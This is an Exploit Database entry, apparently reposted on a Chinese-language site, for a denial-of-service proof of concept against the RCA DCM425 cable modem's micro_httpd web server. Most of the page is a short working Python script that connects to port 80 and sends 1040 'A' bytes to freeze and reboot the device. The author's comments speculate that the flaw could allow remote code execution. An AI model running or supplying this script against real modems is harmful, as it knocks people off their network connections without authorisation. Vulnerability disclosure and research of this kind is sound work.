RCA DCM425 Cable Modem – ‘micro_httpd’ Denial of Service (PoC)

• Exploit Database
• 10 阅读

• 作者： ad0nis
  日期： 2010-02-28
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/11597/

• #!/usr/bin/python
  # Title: RCA DCM425 Cable Modem micro_httpd DoS/PoC
  # Date: 02/27/10
  # Author: ad0nisad0nis@hackermail.com
  # Info: This script causes a Denial of Service on a DCM425 cable modem.
  # Sending 1040 bytes causes a reboot of the device after a few seconds
  # of it freezing up. I believe this may lead to remote code execution
  # but I did not bother to test it further.
  
  # By default, this cable modem has an IP address of 192.168.100.1
  
  # There are two different but similar models of this router, the only
  # difference I see between them is that one has an On/Off button on the
  # front. The one I discovered this on is the one without a button. I
  # have not tested this on the other model.
  
  # Thanks to ShadowHatesYou for the inspiration to look closer at the
  # little black box on my network.
  
  import sys, socket
  target = sys.argv[1]
  buffer = ( "\x41" * 1040 )
  print "Sending 1040 A's to" ,target, "on port 80\n"
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((target,80))
  s.send(buffer)
  s.close()